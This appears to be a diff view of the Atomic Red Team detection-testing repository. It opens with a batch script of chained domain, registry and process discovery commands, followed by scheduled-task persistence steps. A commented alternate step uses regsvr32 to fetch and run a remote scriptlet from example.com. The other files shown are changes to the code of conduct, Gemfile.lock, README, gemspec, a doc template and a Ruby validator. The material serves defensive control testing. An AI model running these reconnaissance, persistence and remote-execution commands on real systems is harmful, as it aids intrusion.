net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
atomics/T1547.001/src/Discovery.bat → ARTifacts/Misc/Discovery.bat
+1 -1
View File
@@ -8,7 +8,7 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
CODE_OF_CONDUCT.md
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
Gemfile.lock
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
README.md
+48 -40
View File
@@ -1,53 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" />
<a
href="https://opensourcesecurityindex.io/"
target="_blank"
rel="noopener"
>
<img
style="width: 282px; height: 56px"
src="https://opensourcesecurityindex.io/badge.svg"
alt="Open Source Security Index - Fastest Growing Open Source Security Projects"
width="282"
height="56"
/>
</a>
</p>
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1274-flat.svg)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
## Philosophy
## Get started
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
## Learn more
The best test is the one you actually run.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
See: https://atomicredteam.io
## Contribute to Atomic Red Team
## Having trouble?
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
## Getting Started
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic-red-team.gemspec
+2 -2
View File
@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
end
atomic_red_team/atomic_doc_template.md.erb
+13 -59
View File
@@ -1,7 +1,7 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
@@ -13,83 +13,37 @@
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'].strip -%>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
<%- end -%>
atomic_red_team/atomic_red_team.rb
+13 -111
View File
@@ -1,7 +1,6 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
@@ -29,29 +28,6 @@ class AtomicRedTeam
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
test_list = Array.new
atomic_tests.find do |atomic_yaml|
if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
atomic_yaml['atomic_tests'].each do |a_test|
if a_test["supported_platforms"].include?(platform[:platform])
test_list.append(a_test)
end
end
end
end
test_list
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
@@ -70,42 +46,26 @@ class AtomicRedTeam
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exists? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
@@ -117,34 +77,20 @@ class AtomicRedTeam
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
@@ -165,7 +111,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -175,7 +121,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
@@ -190,50 +136,6 @@ class AtomicRedTeam
end
end
